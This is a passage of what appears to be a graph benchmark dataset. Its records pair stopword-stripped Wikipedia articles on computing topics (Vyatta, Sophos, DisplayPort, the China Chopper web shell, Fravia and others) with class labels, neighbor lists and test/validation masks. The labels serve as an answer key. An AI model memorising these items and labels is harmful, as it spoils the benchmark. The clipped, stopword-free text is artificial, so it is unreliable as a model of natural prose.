    "text": "Fenix_Project:fenix project fenix project codename gnu project create free compiler scripting language derived one created hammer technologies game development suite div games studio however several features added make incompatible games programmed div games studio fenix interpreted language focused 2d video game development main feature inherited div pseudo-parallel programming similar coroutines i.e gives developer chance programming different processes enemies characters etc separately engine synchronize makes video game developing much easier features based simple directmedia layer sdl makes fenix portable project features include full 2d support scaling transparencies blend ops ... 16 bpp color sound .ogg .mod .it .s3m .wav joystick support mode7 extensions via libraries current version 0.92a beta project maintainer currently taking care updating old 0.84 branch — happened quite unstable — retaken splintergu developer argentina cleaned known bugs also gnu default automake/autoconf build system increases portability implemented making easy add support bsd systems fenix although splintergu mainly focused stabilizing 0.84 branch also added new capabilities fenix like better control debug console also making display information fenix 0.8 developers started fenix 2 branch feature completely rewritten core top users game developers may plug required libraries thus increasing flexibility modularity however second effort seems taking long time eta news project given developers might made public soon splintergu publicly showing interest separating fenix core rest interpreter disagreements members community decided fork fenix bennugd continued working bennugd come long way currently much advanced stabilized state current version fenix 0.92a program separated core multiple modules core much improved example optimizing process handling modules tidied many bugfixes done addition improvements language expanded functionality like error handling goto bennu forum quite active bennu wiki good source documentation fenix comes console program several ides around popular fbtwo_project many general-purpose ides easily adapted",
    "neighbors": [
      1952,
      5346,
      6797,
      303,
      10480,
      2804,
      9780,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9046,
    "label": 9,
    "text": "COLT_(software):colt software colt code orchestra livecoding tool actionscript javascript livecoding tool code orchestra available subscription first version colt released may 2013 time first available livecoding tool actionscript language minor updates included mobile development support using adobe air technology ios android devices version 1.1 included upgraded flex compiler boasting 3x compilation speed increase allowed using compiler bundled application external compiler actionscript ides using external api version 1.2 featured javascript support completely reworked user interface colt separate tool used ide unlike livecoding tools limit user usage specific development environment code/resource routine triggered alteration file within colt project configured paths also provides external api providing methods export project run livecoding sessions production build routines etc ease ide integration prevent application hanging crashing due possible mistypes live code updates colt manages protect running application following potentially dangerous cases version 1.2.2 includes support actionscript javascript programming languages",
    "neighbors": [
      10097,
      803,
      3462,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9047,
    "label": 9,
    "text": "PAL_(programming_language):pal programming language pal pedagogic algorithmic language programming language developed massachusetts institute technology around 1967 help teach programming language semantics design direct descendant iswim owes much philosophy christopher strachey initial implementation pal lisp written peter landin james h. morris jr later redesigned martin richards thomas j. barkalow arthur evans jr. robert m. graham james morris john wozencraft implemented richards barkalow bcpl intermediate-code interpreter ran ibm system/360 called pal/360 rpal right-reference pedagogic algorithmic language functional subset pal implementation sourceforge used university florida teach construction programming languages functional programming programs strictly functional sequence assignment operations",
    "neighbors": [
      1349,
      8262,
      10508,
      5456,
      6160,
      1333,
      10581,
      7386,
      1947
    ],
    "mask": "None"
  },
  {
    "node_id": 9048,
    "label": 4,
    "text": "Vyatta:vyatta vyatta subsidiary american telecommunications company provides software-based virtual router virtual firewall vpn products internet protocol networks ipv4 ipv6 free download vyatta available since march 2006 system specialized debian-based linux distribution networking applications quagga openvpn many others standardized management console similar juniper junos cisco ios addition web-based gui traditional linux system commands provides configuration system applications recent versions vyatta web-based management interface supplied subscription edition however functionality available kvm serial console ssh/telnet protocols software runs standard x86-64 servers vyatta also delivered virtual machine file provide vrouter vfirewall vpn functionality xen vmware kvm rackspace softlayer amazon ec2 virtual cloud computing environments october 2012 vyatta also available amazon marketplace purchased service provide vpn cloud bridging network functions users amazon aws services vyatta sells subscription edition includes functionality open source version well graphical user interface access vyatta restful api serial support tacacs+ config sync system image cloning software updates 24x7 phone email technical support training certification vyatta professional available vyatta also offers professional services consulting engagements vyatta system intended replacement cisco ios 1800 asr 1000 series integrated services routers isr asa 5500 security appliances strong emphasis cost flexibility inherent open source linux-based system running commodity x86 hardware vmware esxi microsoft hyper-v citrix xenserver open source xen kvm virtual environments 2012 brocade communications systems acquired vyatta april 2013 brocade renamed product vyatta subscription edition vse brocade vyatta 5400 vrouter latest commercial release brocade vrouter longer open-source based june 2017 brocade sold vyatta software technology communications vyatta vrouter technology still used several actors vrouter market free community vyatta core software vc open source network operating system providing advanced ipv4 ipv6 routing stateful firewalling secure communication ipsec based vpn well ssl based openvpn october 2013 independent group started fork vyatta core name vyos",
    "neighbors": [
      2049,
      2563,
      4611,
      6153,
      8211,
      9764,
      2085,
      550,
      9253,
      10790,
      11305,
      8753,
      56,
      569,
      59,
      9279,
      10303,
      4673,
      2118,
      8265,
      1110,
      2136,
      4194,
      3685,
      9318,
      10858,
      10860,
      2671,
      8816,
      5749,
      11388,
      8837,
      1172,
      10394,
      3742,
      673,
      3745,
      3243,
      1708,
      4268,
      686,
      7854,
      10417,
      2738,
      7859,
      2228,
      4790,
      3777,
      10433,
      9927,
      5322,
      8907,
      11468,
      4814,
      7887,
      7376,
      9423,
      10451,
      1754,
      6364,
      5860,
      4841,
      6890,
      3819,
      5356,
      7913,
      10987,
      8943,
      7920,
      9971,
      9461,
      6393,
      1273,
      3322,
      8957,
      9983,
      1792,
      2825,
      7435,
      2321,
      1814,
      4887,
      9496,
      6431,
      10530,
      10531,
      8998,
      3885,
      7983,
      3903,
      11073,
      1858,
      2884,
      2375,
      5959,
      11086,
      4435,
      4953,
      5978,
      2907,
      5469,
      5470,
      5472,
      2914,
      3941,
      3942,
      8039,
      9064,
      7020,
      7534,
      9074,
      5499,
      4480,
      10127,
      3482,
      11162,
      1436,
      4511,
      10149,
      3497,
      7082,
      939,
      439,
      9655,
      3007,
      5057,
      4039,
      7121,
      10708,
      4568,
      5084,
      9693,
      10210,
      485,
      11248,
      8177,
      499,
      9722
    ],
    "mask": "None"
  },
  {
    "node_id": 9049,
    "label": 4,
    "text": "The_CIS_Critical_Security_Controls_for_Effective_Cyber_Defense:cis critical security controls effective cyber defense center internet security critical security controls effective cyber defense publication best practice guidelines computer security project initiated early 2008 response extreme data losses experienced organizations us defense industrial base recently publication initially developed sans institute ownership transferred council cyber security ccs 2013 transferred center internet security cis 2015 earlier known consensus audit guidelines also known cis csc cis 20 ccs csc sans top 20 cag 20 guidelines consist 20 key actions called critical security controls csc organizations take block mitigate known attacks controls designed primarily automated means used implement enforce monitor security controls give no-nonsense actionable recommendations cyber security written language ’ easily understood personnel goals consensus audit guidelines include version 3.0 released april 13 2011 version 5.0 released february 2 2014 council cyber security ccs version 6.0 released october 15 2015 consists security controls version 6.1 released august 31 2016 priorization version 6 version 7 released march 19 2018 version 7.1 released april 4 2019 compared version 5 version 6/6.1 re-prioritized controls changed two controls version 7 controls 3 4 5 reshuffled controls 1-6 considered basic 7-16 foundational 17-20 organizational also released cis ram information security risk assessment method help implement cis controls consensus audit guidelines cag compiled consortium 100 contributors us government agencies commercial forensics experts pen testers authors initial draft include members starting 2009 us department state began supplementing risk scoring program part using consensus audit guidelines according department measurements first year site scoring using approach department reduced overall risk key unclassified network nearly 90 percent overseas sites 89 percent domestic sites",
    "neighbors": [
      2628,
      10437,
      4936,
      399,
      3353,
      3994,
      7228,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9050,
    "label": 2,
    "text": "NetRexx:netrexx netrexx open source originally ibm variant rexx programming language run java virtual machine supports classic rexx syntax reserved keywords along considerable additions support object-oriented programming manner compatible java object model yet used compiled interpreted language option using data types native jvm netrexx runtime package latter offers standard rexx data type combines string processing unlimited precision decimal arithmetic integration jvm platform tight existing java class libraries used unchanged without special setup time java programmer opt use rexx class runtime package improved string handling java syntax source programs netrexx free download rexx language association ibm announced transfer netrexx 3.00 source code rexx language association rexxla june 8 2011 1995 mike cowlishaw ported java os/2 soon started experiment run rexx jvm rexx generally considered first general purpose scripting languages netrexx first alternative language jvm 0.50 release april 1996 contained netrexx runtime classes translator written rexx tokenized turned os/2 executable 1.00 release came available january 1997 contained translator bootstrapped netrexx release 2.00 became available august 2000 major upgrade interpreted execution added mike cowlishaw left ibm march 2010 future ibm netrexx open source unknown ibm finally announced transfer netrexx source code rexx language association rexxla june 8 2011 14 years v1.0 release ibm released netrexx source code rexxla icu license rexxla shortly released netrexx 3.00 followed regular releases latest one 3.07 2018-10-01. icu license approved osi appears variant expat license syntax object model netrexx differ object rexx another ibm object-oriented variant rexx released open source software successor oorexx shares syntactical elements codice_1 codice_2 found classical rexx netrexx written netrexx uses decimal arithmetic rexx specified ansi x3.274",
    "neighbors": [
      9345,
      8262,
      11625,
      5677,
      5872,
      8502,
      5751,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 9051,
    "label": 4,
    "text": "Fravia:fravia fravia spoke six languages including latin degree history early middle ages expert linguistics-related informatics five years made available large quantity material related reverse engineering website also hosted advice reverse engineering experts known reversers provided tutorials essays hack software code well advice related assembly disassembly applications software protection reversing fravia professor high cracking university +hcu founded old red cracker +orc legendary figure reverse engineering conduct research reverse code engineering addition sign front nickname reverser signified membership +hcu website known +fravia pages reverse engineering used challenge programmers well wider society reverse engineer brainwashing corrupt rampant materialism heyday website receiving millions visitors per year influence widespread web presence dates 1995 first got involved research related reverse code engineering rce 2000 changed focus concentrated advanced internet search methods reverse engineering search engine code websites www.fravia.com www.searchlores.org contained large amount specialised information related data mining website www.searchlores.org called useful instrument searching web www.fravia.com site described required reading spy wanting go beyond simple google searches 1980s member esteban canal chess club venice moving ces brussels graduated history university venice 1994 fravia master degree history philosophy 1999 interested studying arts humanities aiming build collective knowledge particular subject learning web-searching art spoke six languages including latin fravia participated speaker 22nd chaos communication congress lecture subject hacking fravia focusing privacy created myth fjalar ravia aka fravia+ msre spini red avenger ~s~ sustrugiel pellet ravia f. protection hostile seekers least two distinct phases internet public work identified first period fravia focused reverse-engineering software protection content copyright software patents steps cracking software protection many cases published website form essays old red cracker lessons fravia asked safety precaution community remove web every copy old site www.fravia.org corresponding period idea convert young crackers ... experiment worked part hence decision couple years ago freeze site nevertheless mirrors still exist fravia website described containing useful tools products according 2001 acm multimedia workshops association computing machinery fravia website contained information could assist hackers certain classification skilled enough mount new novel attack website also analysed brute force attacks steganography period included papers related reality-cracking i.e capacity seeker decode hidden facts behind appearance reverse engineering legitimately bought program studying modifying code knowledge claimed legal fravia least european union restricted conditions transition two phases occurred realizing growing importance internet search engines tools access information according vision access information restricted advocating true openness web information contents strongly criticized large amount advertising internet considered promoting unnecessary products population naive consumers richard stallman web article ubuntu spyware mentions friend fravia alerted fact fravia windows system sent information packet external server detected firewall fravia computer second stage work fravia explained content currently structured world wide web difficulties finding relevant information search engines growing number ads search engines promote today 2005 fravia keynote speaker t2 infosec conference subject speech web bottomless cornucopia immense garbage dump fravia professor high cracking university +hcu founded old red cracker +orc considered genius reverse engineering legendary figure rce advance research reverse code engineering rce addition sign front nickname reverser signified membership +hcu amongst students +hcu top elite windows reversers worldwide +hcu published new reverse engineering problem annually small number respondents best replies qualified undergraduate position university fravia website known +fravia pages reverse engineering used challenge programmers well wider society reverse engineer brainwashing corrupt rampant materialism heyday website received millions visitors per year influence widespread nowadays graduates +hcu migrated linux remained windows reversers information university rediscovered new generation researchers practitioners rce started new research projects field founding cast members first professors denoted symbol +hcu along fravia fravia postings +aesculapius +greythorne technomancer +indian trail +malattia +mammon_ +rezident +sandman fravia described inspiration many hackers reversers friend founder ccc wau holland motivation jon lech johansen understand inner workings computer programs johansen commented blog post fravia site goldmine education reverse engineer later years moved software reversing free software searching web website described meeting point people wanted search web deeper still september 2008 fravia stopped updating site holding conferences diagnosed receiving treatment squamous cell carcinoma tonsil metastasized site frozen half year updated 9 march 2009 fravia slowly recovering focusing gnu/linux fravia died suddenly sunday 3 may 2009 age 56",
    "neighbors": [
      10372,
      1540,
      823,
      4956,
      10173
    ],
    "mask": "Test"
  },
  {
    "node_id": 9052,
    "label": 4,
    "text": "China_Chopper:china chopper china chopper web shell 4 kilobytes size first discovered 2012 web shell commonly used malicious chinese actors including advanced persistent threat apt groups remotely control web servers web shell two parts client interface executable file receiver host file compromised web server china chopper many commands control features password brute-force attack option code obfuscation file database management graphical user interface originally distributed website www.maicaidao.com fireeye revealed client web shell programmed microsoft visual c++ 6.0 china chopper used attacks eight australian web hosting providers compromised due use unsupported operating system windows server 2008 hackers connected web servers monero mining pool way cryptocurrency miners pool resources mined au 3868 worth monero",
    "neighbors": [
      225,
      7556,
      8171,
      4830,
      2901,
      5563,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9053,
    "label": 4,
    "text": "Email_filtering:email filtering email filtering processing email organize according specified criteria term apply intervention human intelligence often refers automatic processing incoming messages anti-spam techniques outgoing emails well received email filtering software may reject item initial smtp connection stage pass unchanged delivery user mailbox alternatively redirect message delivery elsewhere quarantine checking edit 'tag way common uses mail filters include organizing incoming email removal spam computer viruses less common use inspect outgoing email companies ensure employees comply appropriate policies laws users might also employ mail filter prioritize messages sort folders based subject matter criteria mailbox providers also install mail filters mail transfer agents service customers anti-virus anti-spam url filtering authentication-based rejections common filter types corporations often use filters protect employees information technology assets catch-all filter catch emails addressed domain exist mail server help avoid losing emails due misspelling users may able install separate programs see links configure filtering part email program email client email programs users make personal manual filters automatically filter mail according chosen criteria mail filters operate inbound outbound email traffic inbound email filtering involves scanning messages internet addressed users protected filtering system lawful interception outbound email filtering involves reverse scanning email messages local users potentially harmful messages delivered others internet one method outbound email filtering commonly used internet service providers transparent smtp proxying email traffic intercepted filtered via transparent proxy within network outbound filtering also take place email server many corporations employ data leak prevention technology outbound mail servers prevent leakage sensitive information via email mail filters varying degrees configurability sometimes make decisions based matching regular expression times code may match keywords message body perhaps email address sender message complex control flow logic possible programming languages typically implemented data-driven programming language procmail specifies conditions match actions take matching may involve matching advanced filters particularly anti-spam filters use statistical document classification techniques naive bayes classifier image filtering use complex image-analysis algorithms detect skin-tones specific body shapes normally associated pornographic images microsoft outlook includes user-generated email filters called rules",
    "neighbors": [
      1667,
      10245,
      3465,
      4105,
      8202,
      914,
      5012,
      2325,
      8343,
      2969,
      7066,
      6431,
      8224,
      11177,
      8747,
      4272,
      7739,
      3645,
      10696,
      2251,
      5334,
      1495,
      4325,
      6246,
      6762,
      1771,
      1899,
      2539,
      5357,
      9451,
      10226,
      10866,
      1653,
      1529,
      8061
    ],
    "mask": "None"
  },
  {
    "node_id": 9054,
    "label": 2,
    "text": "General_Graphics_Interface:general graphics interface general graphics interface ggi project aimed develop reliable stable fast computer graphics system works everywhere intent allow program using ggi run computing platform supported requiring recompilation ggi free open-source software subject requirements mit license ggi project related projects kgi generally acknowledged dead project originally started make switching back forth virtual consoles svgalib x display server subsystems linux reliable goals ggi framework implemented set portable user-space libraries array different backends targets e.g linux framebuffer x11 quartz directx two fundamental libgii input-handling libggi graphical output packages add features core libraries depend one targets talk targets called pseudo targets pseudo targets combined work like pipeline one example display-palemu example emulates palette mode truecolor modes allows users run applications palette mode even machines palette mode would available otherwise display-tile splits large virtual display many smaller pieces spread multiple monitors even forward network andreas beck steffen seeger founded ggi project 1994 experimental precursors called scrdrv development scrdrv motivated problems caused coexisting well cooperating graphics environments mainly x svgalib linux operating system time frequently lead lockups requiring reboot first scrdrv design heavily influenced graphics subsystem dj dos extender concepts sane project basic problem scrdrv solved provided kernel mode driver knew enough video hardware set modes thus allowing get sane state even messed-up crashed graphics application first official version appeared 1995 1996 ggi 1.0 released lgpl license ggi consisted core lib named libggi included input handling set 2d graphic primitives userspace drivers graphic boards along linux kernel patch userspace interface drivers patch known kgi kernel graphics interface 1997 ggi went complete re-design many new ideas decision linux made ggi became ggi 2.0 released august 2001 mit release 1998 big flame war linux kernel mailing list getting kgi kernel linus torvalds explained concerns ggi stating think x good enough expressing concern regarding overall direction ggi time another design idea called evstack also added flamewar evstack pretty much complete redesign input output subsystem allowed events thus ev flow stack modules configured manipulate evstack powerful concept allowing e.g two keyboards attached machine one operating text console one graphics adapter one operating graphics console demonstrated linux-kongreß ´97 even allows different keyboard layouts different virtual consoles attaching keyboards via network however came price huge patch input subsystem seem acceptable modern linux input event system allows programs e.g xorg receive keyboard events console keyboard allowing multiseat operation set talks ggi kgi evstack given linuxexpo 98 ggi 2.0 kgi split became project named kgi project ggi 2.0 consisted set libraries 2.0 beta phase late 1998 license libraries changed lgpl mit-style license much work also done buildsystem support operating systems worked freebsd code openbsd netbsd even ms-windows well support hardware platforms input handling moved library called libgii generic ggi code libgg sublib within libgii core graphic library libggi lightweight set graphic primitives common enough write kind graphic application higherlevel api went libraries top libggi called ggi extensions libggi support set targets linux specific fbdev x aa vcsa terminfo pseudo targets tile multi palemu trueemu ggi extensions featured higherlevel api libggiwmh provides functionality windowed targets time x. libggimisc provided basic stuff like vga splitline ggi 2.0.2 released december 2002 user visible change scratch re-designed x backend another noticeable change huge documentation improvement last least release cycles changed release development stable tree stable tree open bugfixes development tree got name following bsd scheme -current november 2004 last bugfix ggi 2.0.x stable tree released favour new ggi 2.1.x stable tree ggi 2.1.x runs many operating systems gnu hurd linux *bsd system v mac os x ms windows support hardware platforms added netbsd even created binary package netbsd/vax new ggi library top libgii called libgiigic added allows combine user actions events run time ggi 2.2 released december 2005 target auto detection reworked longer linux centric ggi replaced integer datatypes ansi c99 types portability target quartz added mac os x users longer depend x11 still use x11 backend user visible change however support static linked targets latest release ggi 2.2.2 bugfix release ggi 2.2.x stable series released january 2007 ggi project moving onward ggi 3.0 release libgii re-designed input handling replaced reactor event model flexible using select file descriptor also simplified input-drivers general particularly n't use file descriptors input-quartz libgg moved separate library libggi merged targets one sublib multi tile mono text palemu libggi also gotten new vnc target allowed run application vnc server ggi 3.0 extension mechanism re-designed scratch simplify interactions extensions core libs required little api change",
    "neighbors": [
      1952,
      10016,
      4902,
      2730,
      10255,
      6352,
      10480,
      2676,
      2804,
      823,
      8984,
      6813,
      9438,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 9055,
    "label": 4,
    "text": "Sophos:sophos sophos group plc british security software hardware company sophos develops products communication endpoint encryption network security email security mobile security unified threat management sophos primarily focused providing security software mid market pragmatic enterprise 100- 5,000-seat organizations whilst primary focus sophos also protects home users free antivirus software sophos home intended demonstrate product functionality listed london stock exchange constituent ftse 250 index sophos founded jan hruska peter lammer began producing first antivirus encryption products 1985 late 1980s 1990s sophos primarily developed sold range security technologies uk including encryption tools available users private business late 1990s sophos concentrated efforts development sale antivirus technology embarked program international expansion 2003 sophos acquired activestate north american software company developed anti-spam software time viruses spread primarily email spam allowed sophos produce combined anti-spam antivirus solution 2006 peter gyenes steve munford named chairman ceo sophos respectively jan hruska peter lammer remain members board directors 2010 majority interest sophos sold apax 2010 nick bray formerly group cfo micro focus international named cfo sophos 2011 utimaco safeware ag acquired sophos 2008-9 accused supplying data monitoring tracking software partners sold governments syria sophos issued statement apology confirmed suspended relationship partners question launched investigation 2012 kris hagerman formerly ceo corel corporation named ceo sophos joined company board former ceo steve munford became non-executive chairman board february 2014 sophos announced acquired cyberoam technologies provider network security products june 2015 sophos announced plans raise us100 million london stock exchange september 2003 february 2006 sophos served parent company activestate developer programming tools dynamic programming languages february 2006 activestate became independent company sold vancouver-based venture capitalist firm pender financial 2007 sophos acquired endforce company based ohio united states developed sold security policy compliance network access control nac software july 2008 sophos announced intention acquire utimaco safeware ag july 2009 sophos completed integration utimaco safeware ag may 2010 sophos reached definitive agreement sell majority interest company apax partners global private equity group may 2011 sophos announced entered agreement acquire astaro privately held provider network security solutions headquartered wilmington massachusetts united states karlsruhe germany 2012 sophos acquired remained virusbuster – hungarian antivirus firm – company closed april 2012 sophos acquired dialogs privately held provider mobile management solutions headquartered germany february 2014 sophos announced acquired cyberoam technologies leading global provider network security products october 2014 sophos acquired mojave networks leading cloud-based security startup december 14 2015 sophos acquired surfright small dutch company behind hitmanpro strengthen endpoint protection products november 2016 sophos acquired barricade pioneering start-up powerful behavior-based analytics engine built machine learning techniques strengthen synchronized security capabilities next-generation network endpoint protection february 2017 sophos acquired invincea software company provides malware threat detection prevention pre-breach forensic intelligence",
    "neighbors": [
      2049,
      535,
      28,
      1052,
      4129,
      4133,
      550,
      2601,
      6699,
      3629,
      4659,
      1591,
      9791,
      10308,
      7251,
      2654,
      6246,
      119,
      10872,
      10875,
      9341,
      127,
      7809,
      131,
      9356,
      4240,
      4753,
      10384,
      10385,
      4756,
      10392,
      3739,
      156,
      2721,
      2213,
      9894,
      6823,
      3243,
      6834,
      704,
      7362,
      202,
      7886,
      2257,
      1242,
      8413,
      9439,
      4843,
      6382,
      9983,
      5891,
      11019,
      3342,
      9488,
      4374,
      11542,
      4382,
      6431,
      5924,
      1318,
      2859,
      1837,
      3885,
      4403,
      9523,
      3382,
      11577,
      9537,
      4421,
      331,
      1355,
      10574,
      8024,
      2907,
      9055,
      11104,
      9569,
      11622,
      4464,
      1393,
      5490,
      3955,
      2425,
      4480,
      7044,
      9096,
      1417,
      3981,
      10637,
      9106,
      3484,
      9630,
      11166,
      5540,
      7590,
      8614,
      8615,
      1961,
      939,
      4013,
      7601,
      10166,
      4023,
      7103,
      4032,
      5057,
      1994,
      5069,
      10708,
      2005,
      11225,
      8668,
      9186,
      998,
      9713,
      6643,
      10745,
      4605,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9056,
    "label": 3,
    "text": "Monitor_Control_Command_Set:monitor control command set vesa monitor control command set mccs computer standard developed video electronics standards association defines binary protocol controlling properties computer monitors host device pc set-top box etc mccs requires bidirectional communication protocol like display data channel host display although specification favour particular protocol virtual control panel vcp code binary code represents single command entity mccs language command contains variable number data parameters command attributes following groups controls defined standard three categories controls exist control data may read write rw read-only ro write-only wo display exposes supported internal controls via capability strings original mccs standard version 1 released september 11 1998 mccs version 2 released october 17 2003 major update standard provided support flat panel displays vesa dpvl digital packet video link standard added range television controls introduced individual control multiple windows display new classes vcp codes associated asset management secondary displays information status etc remote program calls display processor introduced mccs version 2 revision 1 released may 28 2005 included minor updates well clarifications improved usability standard mccs version 3 released july 27 2006 major revision update introduced significant changes however revision seen little support industry latest release v2 standard version 2.2a adopted january 2011",
    "neighbors": [
      9057,
      4567,
      11631,
      4191
    ],
    "mask": "Test"
  },
  {
    "node_id": 9057,
    "label": 3,
    "text": "DisplayPort:displayport displayport dp digital display interface developed consortium pc chip manufacturers particularly maxell lattice philips sony standardized video electronics standards association vesa interface primarily used connect video source display device computer monitor also carry audio usb forms data displayport designed replace vga dvi fpd-link interface backward compatible interfaces hdmi dvi use either active passive adapters displayport first display interface rely packetized data transmission form digital communication found technologies ethernet usb pci express permits use internal external display connections unlike legacy standards transmit clock signal output displayport protocol based small data packets known micro packets embed clock signal within data stream allows higher resolution using fewer pins use data packets also makes displayport extensible meaning additional features added time without significant changes physical interface displayport used transmit audio video simultaneously although optional transmitted without video signal path range six sixteen bits per color channel audio path eight channels 24-bit 192khz pcm audio uncompressed bi-directional half-duplex auxiliary channel carries device management device control data main link vesa edid mccs dpms standards addition interface capable carrying bi-directional usb signals displayport uses lvds signal protocol compatible dvi hdmi however dual-mode displayports designed transmit single-link dvi hdmi protocol tmds across interface use external passive adapter adapter enables compatibility mode converts signal 3.3 volts 5 volts analog vga/ypbpr dual-link dvi powered active adapter required compatibility rely dual mode active vga adapters powered displayport connector directly active dual-link dvi adapters typically rely external power source usb first version 1.0 approved vesa 3 may 2006 version 1.1 ratified 2 april 2007 version 1.1a ratified 11 january 2008 displayport 1.0–1.1a allow maximum bandwidth 10.8gbit/s 8.64gbit/s data rate standard 4-lane main link displayport cables 2 meters length required support full 10.8gbit/s bandwidth displayport 1.1 allows devices implement alternative link layers fiber optic allowing much longer reach source display without signal degradation although alternative implementations standardized also includes hdcp addition displayport content protection dpcp displayport1.1a standard downloaded free vesa website displayport version 1.2 introduced 7 january 2010 significant improvement new version doubling effective bandwidth 17.28gbit/s high bit rate 2 hbr2 mode allows increased resolutions higher refresh rates greater color depth improvements include multiple independent video streams daisy-chain connection multiple monitors called multi-stream transport facilities stereoscopic 3d increased aux channel bandwidth 1mbit/s 720mbit/s color spaces including xvycc scrgb adobe rgb 1998 global time code gtc sub 1µs audio/video synchronisation also apple inc. mini displayport connector much smaller designed laptop computers small devices compatible new standard displayport version 1.2a released january 2013 may optionally include vesa adaptive sync amd freesync uses displayport adaptive-sync feature operation freesync first demonstrated ces 2014 toshiba satellite laptop making use panel-self-refresh psr feature embedded displayport standard proposal amd vesa later adapted panel-self-refresh feature use standalone displays added optional feature main displayport standard name adaptive-sync version 1.2a optional feature support adaptive-sync required display displayport 1.2a-compliant displayport version 1.3 approved 15 september 2014 standard increases overall transmission bandwidth 32.4gbit/s new hbr3 mode featuring 8.1gbit/s per lane 5.4gbit/s hbr2 version 1.2 total data throughput 25.92gbit/s factoring 8b/10b encoding overhead bandwidth enough 4k uhd display 120hz 24bit/px rgb color 5k display 60hz 30bit/px rgb color 8k uhd display 30hz 24bit/px rgb color using multi-stream transport mst displayport port drive two 4k uhd displays 60hz four wqxga displays 60hz 24bit/px rgb color new standard includes mandatory dual-mode dvi hdmi adapters implementing hdmi2.0 standard hdcp2.2 content protection thunderbolt 3 connection standard originally include displayport1.3 capability final release ended version 1.2 vesa adaptive sync feature displayport version 1.3 remains optional part specification displayport version 1.4 published 1 march 2016 new transmission modes defined hbr3 32.4gbit/s introduced version 1.3 still remains highest available mode displayport1.4 adds support display stream compression 1.2 dsc forward error correction hdr10 metadata defined cta-861.3 including static dynamic metadata rec 2020 color space hdmi interoperability extends maximum number inline audio channels 32 dsc visually lossless encoding technique 3:1 compression ratio using dsc hbr3 transmission rates displayport1.4 support 8k uhd 60hz 4k uhd 120hz 30bit/px rgb color hdr 4k 60hz 30bit/px rgb/hdr achieved without need dsc displays support dsc maximum limits unchanged displayport1.3 4k 120hz 5k 60hz 8k 30hz displayport version 1.4a published april 2018 vesa made official press release version updated displayport dsc implementation dsc 1.2 1.2a according roadmap published vesa september 2016 new version displayport intended launched early 2017 would improved link rate 8.1 10.0gbit/s 24 increase would increased total bandwidth 32.4gbit/s 40.0gbit/s however new version released 2017 likely delayed make improvements hdmi forum announced january 2017 next standard hdmi2.1 would offer 48gbit/s bandwidth according press release 3 january 2018 vesa also currently engaged members development next displayport standard generation plans increase data rate enabled displayport two-fold beyond vesa plans publish update within next 18 months ces 2019 vesa announced new version would support 8k 60hz without compression expected released first half 2019 june 26 2019 vesa formally released displayport 2.0 standard vesa stated dp 2.0 first major update displayport standard since march 2016 provides ≈3× improvement data rate 25.92 77.37gbit/s compared previous version displayport 1.4a well new capabilities address future performance requirements traditional displays include beyond 8k resolutions higher refresh rates high dynamic range hdr support higher resolutions improved support multiple display configurations well improved user experience augmented/virtual reality ar/vr displays including support 4k-and-beyond vr resolutions increased bandwidth enabled dp 2.0 vesa offers high degree versatility configurations higher display resolutions refresh rates addition above-mentioned 8k resolution 60hz hdr support dp 2.0 across native dp connector usb-c displayport alt mode enables variety high-performance configurations using two lanes usb-c connector via dp alt mode allow simultaneous superspeed usb data video dp 2.0 enable configurations displayport main link used transmission video audio main link consists number unidirectional serial data channels operate concurrently called lanes standard displayport connection 4 lanes though applications displayport implement thunderbolt 3 interface implements 8 lanes displayport standard displayport connection lane dedicated set twisted-pair wires transmits data across using differential signaling self-clocking system dedicated clock signal channel necessary unlike dvi hdmi vary transmission speed exact rate required specific video format displayport operates specific speeds excess bits transmission filled stuffing symbols displayport versions 1.01.4a data encoded using ansi 8b/10b encoding prior transmission scheme 8 every 10 transmitted bits represent data extra bits used dc balancing ensuring roughly equal number 1s 0s result rate data transmitted 80 physical bitrate transmission speeds also sometimes expressed terms link symbol rate rate 8b/10b-encoded symbols transmitted i.e rate groups 10 bits transmitted 8 represent data following transmission modes defined version 1.01.4a displayport 2.0 uses 128b/132b encoding group 132 transmitted bits represents 128 bits data scheme efficiency 96. addition forward error correction fec consumes small amount link bandwidth resulting overall efficiency ≈96.7 following transmission modes added dp 2.0 total bandwidth main link standard 4-lane connection aggregate lanes transmission mode used displayport main link negotiated source sink device connection made process called link training process determines maximum possible speed connection quality displayport cable insufficient reliably handle hbr2 speeds example displayport devices detect switch lower mode maintain stable connection link re-negotiated time loss synchronization detected audio data transmitted across main link video blanking intervals short pauses line frame video data displayport aux channel half-duplex bidirectional data channel used miscellaneous additional data beyond video audio ic cec commands device manufacturer discretion aux signals transmitted across dedicated set twisted-pair wires displayport1.0 specified manchester encoding 2mbaud signal rate 1mbit/s data rate displayport1.2 introduced second transmission mode called faux fast aux operates 720mbaud 8b/10b encoding 576mbit/s data rate used implement additional transport protocols usb2.0 480mbit/s without need additional cable seen little practical use 2018 displayport cables compatible displayport devices regardless version device cable certification level features displayport function across displayport cable displayport multiple cable designs dp cables basic layout wiring support feature including audio daisy-chaining g-sync/freesync hdr dsc displayport cables differ transmission speed support displayport specifies four different transmission modes rbr hbr hbr2 hbr3 support progressively higher bandwidths displayport cables capable four transmission modes vesa offers certifications level bandwidth certifications optional displayport cables certified vesa cables limited transmission speed still compatible displayport devices may place limits maximum resolution refresh rate available displayport cables classified version although cables commonly labeled version numbers hbr2 cables advertised displayport1.2 cables example notation permitted vesa use version numbers cables seem imply displayport1.4 display requires displayport1.4 cable features introduced dp1.4 hdr dsc function older dp1.2 cables reality neither true displayport cables classified bandwidth certification level rbr hbr hbr2 hbr3 certified displayport cables capable functioning highest levels bandwidth cables may submitted vesa optional certification various bandwidth levels vesa offers three levels cable certification rbr standard dp8k certify displayport cables proper operation following speeds april 2013 vesa published article stating displayport cable certification distinct tiers hbr hbr2 bandwidth certified standard displayport cable—including certified displayport1.1—would able handle 21.6gbit/s bandwidth hbr2 introduced displayport 1.2 standard displayport1.2 standard defines single specification high bit rate cable assemblies used hbr hbr2 speeds although dp cable certification process governed displayport phy compliance test standard cts displayport standard dp8k certification announced vesa january 2018 certifies cables proper operation hbr3 speeds 8.1gbit/s per lane 32.4gbit/s total june 2019 release version 2.0 displayport standard vesa announced dp8k certification also sufficient new uhbr 10 transmission mode new certifications announced uhbr 13.5 uhbr 